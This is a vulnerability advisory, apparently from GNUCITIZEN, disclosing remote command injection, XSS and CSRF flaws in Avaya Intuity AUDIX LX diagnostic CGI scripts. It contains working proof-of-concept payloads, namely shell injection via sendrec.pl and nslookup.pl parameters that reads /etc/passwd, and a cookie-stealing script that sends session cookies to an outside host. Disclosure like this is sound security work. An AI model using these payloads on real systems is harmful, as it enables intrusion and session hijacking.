Title: Multiple Remote Command Execution vulnerabilities on Avaya Intuity Audix LX (plus some client-side bugs)

Similar documents
CIS 4360 Secure Computer Systems XSS

GUI based and very easy to use, no security expertise required. Reporting in both HTML and RTF formats - Click here to view the sample report.

Application vulnerabilities and defences

Ethical Hacking and Countermeasures: Web Applications, Second Edition. Chapter 3 Web Application Vulnerabilities

WEB SECURITY WORKSHOP TEXSAW Presented by Solomon Boyd and Jiayang Wang

CSCE 813 Internet Security Case Study II: XSS

MWR InfoSecurity Advisory. 26 th April Elastic Path Administrative. Quit. Session Hijacking through Embedded XSS

Web Application Security. Philippe Bogaerts

Security Research Advisory ToutVirtual VirtualIQ Pro Multiple Vulnerabilities

Provide you with a quick introduction to web application security Increase you awareness and knowledge of security in general Show you that any

OWASP Top 10 Risks. Many thanks to Dave Wichers & OWASP

Cross-Site Request Forgery in Cisco SG220 series

RBS NetGain Enterprise Manager Multiple Vulnerabilities of 11

Abusing Windows Opener to Bypass CSRF Protection (Never Relay On Client Side)

Web basics: HTTP cookies

How is state managed in HTTP sessions. Web basics: HTTP cookies. Hidden fields (2) The principle. Disadvantage of this approach

CS 161 Computer Security

WEB SECURITY: XSS & CSRF

Web Security II. Slides from M. Hicks, University of Maryland

Attacks Against Websites. Tom Chothia Computer Security, Lecture 11

Security Research Advisory IBM WebSphere Portal Cross-Site Scripting Vulnerability

COMP9321 Web Application Engineering

Web insecurity Security strategies General security Listing of server-side risks Language specific security. Web Security.

OWASP TOP Release. Andy Willingham June 12, 2018 OWASP Cincinnati

Web basics: HTTP cookies

This slide shows the OWASP Top 10 Web Application Security Risks of 2017, which is a list of the currently most dangerous web vulnerabilities in

OWASP TOP 10. By: Ilia

COMP9321 Web Application Engineering

CS 142 Winter Session Management. Dan Boneh

Application security : going quicker

EasyCrypt passes an independent security audit

C1: Define Security Requirements

2/16/18. CYSE 411/AIT 681 Secure Software Engineering. Secure Coding. The Web. Topic #11. Web Security. Instructor: Dr. Kun Sun

Security Testing White Paper

Common Websites Security Issues. Ziv Perry

Computer Forensics: Investigating Network Intrusions and Cyber Crime, 2nd Edition. Chapter 3 Investigating Web Attacks

Web Application Whitepaper

Authentication and Password CS166 Introduction to Computer Security 2/11/18 CS166 1

WatchGuard AP - Remote Code Execution

Don t blink or how to create secure software. Bozhidar Bozhanov, LogSentinel

MWR InfoSecurity Security Advisory. DotNetNuke Cross Site Request Forgery Vulnerability Contents

CNIT 129S: Securing Web Applications. Ch 12: Attacking Users: Cross-Site Scripting (XSS) Part 2

Robust Defenses for Cross-Site Request Forgery

DEFENSIVE PROGRAMMING. Lecture for EDA 263 Magnus Almgren Department of Computer Science and Engineering Chalmers University of Technology

OWASP Top 10 The Ten Most Critical Web Application Security Risks

Copyright

Is Browsing Safe? Web Browser Security. Subverting the Browser. Browser Security Model. XSS / Script Injection. 1. XSS / Script Injection

Solutions Business Manager Web Application Security Assessment

P2_L12 Web Security Page 1

W e b A p p l i c a t i o n S e c u r i t y : T h e D e v i l i s i n t h e D e t a i l s

Introduction to Ethical Hacking

2/16/18. Secure Coding. CYSE 411/AIT 681 Secure Software Engineering. Web Security Outline. The Web. The Web, Basically.

CS 155 Project 2. Overview & Part A

CSC 482/582: Computer Security. Cross-Site Security

Information Security CS 526 Topic 11


Web Security. Thierry Sans

Aguascalientes Local Chapter. Kickoff

COMP9321 Web Application Engineering

CSCD 303 Essential Computer Security Fall 2018

Web Application Security

WHY CSRF WORKS. Implicit authentication by Web browsers

Perslink Security. Perslink Security. Eleonora Petridou Pascal Cuylaerts. System And Network Engineering University of Amsterdam.

Executive Summary. Flex Bounty Program Overview. Bugcrowd Inc Page 2 of 7

Computer Security 3e. Dieter Gollmann. Chapter 18: 1

Information Security CS 526 Topic 8

Hunting Bugs in Web App. By Suleman Malik

CSCD 303 Essential Computer Security Fall 2017

ESORICS September Martin Johns

Penetration Testing following OWASP. Boyan Yanchev Chief Technology Ofcer Peter Dimkov IS Consultant

Avactis PHP Shopping Cart ( Full Disclosure

Web security: an introduction to attack techniques and defense methods

Exploiting and Defending: Common Web Application Vulnerabilities

Attacking the Application OWASP. The OWASP Foundation. Dave Ferguson, CISSP Security Consultant FishNet Security.

OWASP Top 10. Copyright 2017 Ergon Informatik AG 2/13

Web Vulnerabilities. And The People Who Love Them

Content Security Policy

Security in a Mainframe Emulator. Chaining Security Vulnerabilities Until Disaster Strikes (twice) Author Tim Thurlings & Meiyer Goren

Advanced Web Technology 10) XSS, CSRF and SQL Injection

CHAPTER 8 CONCLUSION AND FUTURE ENHANCEMENTS

Chrome Extension Security Architecture

Don't Trust The Locals: Exploiting Persistent Client-Side Cross-Site Scripting in the Wild

Attacks Against Websites 3 The OWASP Top 10. Tom Chothia Computer Security, Lecture 14

RBS Axis Products Management Web Interface Multiple Vulnerabilities of 9

Security Engineering by Ross Andersson Chapter 18. API Security. Presented by: Uri Ariel Nepomniashchy 31/05/2016

Reflected XSS Cross-Site Request Forgery Other Attacks

WebGoat& WebScarab. What is computer security for $1000 Alex?

CSC 405 Computer Security. Web Security

CS 161 Computer Security

1. Oracle mod_plsql v in Oracle9i Application Server v1.0.2.x (Oracle9iAS v1.0.2.x)

Web Attacks Lab. 35 Points Group Lab Due Date: Lesson 16

BAE Systems Detica Security Advisory Atlassian Confluence Multiple Issues

Web Application Threats and Remediation. Terry Labach, IST Security Team

Andrew Muller, Canberra Managing Director, Ionize, Canberra The challenges of Security Testing. Security Testing. Taming the Wild West

Test Harness for Web Application Attacks

Ruby on Rails Secure Coding Recommendations

PROBLEMS IN PRACTICE: THE WEB MICHAEL ROITZSCH

Computer Security CS 426 Lecture 41

CNIT 129S: Securing Web Applications. Ch 10: Attacking Back-End Components

Automatically Checking for Session Management Vulnerabilities in Web Applications

Transcription:

Title: Multiple Remote Command Execution vulnerabilities on Avaya Intuity Audix LX (plus some client-side bugs) Document last modified on: 17th September 2009 Date of discovery of vulnerabilities: December 2008 Successfully tested on: Avaya Intuity AUDIX LX R1.1 [1]. Other versions might also be affected. Summarized Product Description: Multimedia messaging platform supporting voice, email and fax messages. Description: It appears that most diagnostic CGI perl scripts that take user-supplied input are vulnerable to Remote Command Execution. These scripts are located on '/html/cswebadm/basic/cgibin/'. All the RCE vulnerabilities mentioned in this advisory were tested with an authenticated session using the 'craft' account. These vulnerabilities might also be exploitable by less-privileged accounts, but this has NOT been tested. Although authentication is required to exploit the RCE vulns, a privilege escalation vector exists. For instance, when SSHing to the AUDIX LX server using the 'craft' account, it is not possible to get an unrestricted shell. Instead, a menu-driven environment is available with limited functionality such as resetting passwords of voicemail users. Being able to run unrestricted shell commands could help bypass restrictions imposed by web interface, or the menu-driven SSH interface. It is recommended that Avaya audits all perl scripts located on the '/html/cswebadm/basic/ cgi-bin/' directory for command execution vulnerabilities, as auditing random scripts lead to 6 RCE vulnerabilities being discovered. It is definitely suspected that more similar vulnerabilities exist within other diagnostic scripts. The web interface of Avaya Intuity AUDIX LX is also vulnerable to XSS and CSRF which can be used in conjunction with the RCE vulnerabilities in different exploitation scenarios. Affected Versions: Avaya has stated that IALX 1.1, which was discontinued in 2007, is the latest vulnerable version. IALX 2.0 SP2 is not vulnerable according to Avaya. Technical Details - RCE Vulns: All the remote command execution (RCE) vulnerabilities discussed below result in arbitrary commands being run within the context of the 'vexvm' account.

vulnerable script: /cswebadm/diag/cgi-bin/sendrec.pl processed parameters: ipadd, count_p, size_p, opt_n (all parameters allow command injection) real script location: /html/cswebadm/diag/cgi-bin/sendrec.pl Proof of Concept for RCE Vuln #1: Request (some headers were removed for clarity reasons): ipadd=127.0.0.1;cat+/etc/passwd&count_p=1&size_p=56 Command output returned within HTML response: The same vulnerability can also be exploited by omitting the 'count_p' and 'size_p' parameters. i.e.:

POST https://192.168.2.237/cswebadm/diag/cgi-bin/sendrec.pl HTTP/1.1 ipadd=;cat+/etc/passwd Line where injected commands are executed due to lack of filtering against $cmdline variable: $ipinfo = `$cmdline 2>&1`; All other parameters processed by the 'sendrec.pl' script are not sanitized either. Therefore, it is also possible to perform remote command execution via other parameters. Proof of Concept for RCE Vuln #2: Via 'count_p' parameter: ipadd=&count_p=1;ls&size_p=56 Proof of Concept for RCE Vuln #3: Via 'size_p' parameter: ipadd=&count_p=1&size_p=;ls&opt_n= Proof of Concept for RCE Vuln #4: Via 'opt_n' parameter: ipadd=&count_p=1&size_p=56&opt_n=;ls vulnerable script: /cswebadm/diag/cgi-bin/nslookup.pl processed parameters: host_or_ip, server, r_type ('server' and 'r_type' parameters allow command injection) real script location: /html/cswebadm/diag/cgi-bin/nslookup.pl Proof of Concept for RCE Vuln #5: Request (some headers were removed for clarity reasons): POST /cswebadm/diag/cgi-bin/nslookup.pl HTTP/1.1 host_or_ip=127.0.0.1&r_type=;ls; It is important to note that in this case we DO need a well-formed IP address for the command to succeed due to the following filtering logic within the nslookup.pl script: if ($key eq "host_or_ip") { $ip_host=$value; $_=$ip_host; if ((!/^ (\d [01]?\d\d 2[0-4]\d 25[0-5] ) \. (\d [01]?\d\d 2[0-4]\d 25[0-5] ) \. (\d [01]?\d\d 2[0-4]\d 25[0-5] )

\. (\d [01]?\d\d 2[0-4]\d 25[0-5] ) $/) && (!/^[\w-.]+[\w\s]$/)) { $error_f="host or IP address:\"$ip_host\" is not valid\n"; } Note: notice that now we need two semicolons in our payload rather than only one Proof of Concept for RCE Vuln #6: Via 'server' parameter: POST /cswebadm/diag/cgi-bin/nslookup.pl HTTP/1.1 host_or_ip=127.0.0.1&server=;ls;&r_type=a Technical Details - XSS vuln: non-sanitized parameter: url script where vulnerable non-sanitized parameter is submitted: /cgi-bin/smallmenu.pl Harmless PoC: https://10.100.2.2/cgi-bin/smallmenu.pl?url=%3c/ title%3e%3cscript%3ealert(document.cookie)%3c/script%3e Cookie-theft PoC which results in the session of the targeted user being hijacked, as the value of the session ID ('sessionid' parameter) is stored within cookies: https://10.100.2.2/cgi-bin/ smallmenu.pl?url=</title><script>location%3d'http://www.gnucitizen.org/?'%2bdocument.cookie</script> Technical Details - CSRF vuln: Observing HTTP traffic while logged into the web interface of Avaya Intuity AUDIX reveals that no tokenization is in place to protect administrative changes from being forged via CSRF attacks. An HTML form can be created and submitted automatically when the malicious page is visited by using the JavaScript 'submit()' method. Exploitation Scenarios: 1. Exploited vulnerability: RCE Malicious user with access to web interface exploits a RCE vulnerability to bypass restrictions enforced by the web interface. 2. Exploited vulnerabilities: XSS + RCE Attacker with no previous access to web interface tricks a legitimate (authenticated) user to visit a specially-crafted URL. This results in stealing the targeted user's cookie (session hijacking). Once the session is hijacked, the attacker can perform remote execution of arbitrary commands. 3. Exploited vulnerabilities: CSRF + RCE

Attacker tricks victim to visit a malicious page which results in a RCE vulnerability being exploited. Credits: Adrian 'pagvac' Pastor GNUCITIZEN.org References: [1] Avaya - INTUITY AUDIX LX Overview http://support.avaya.com/japple/css/japple?page=product&temp.productid=136319

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback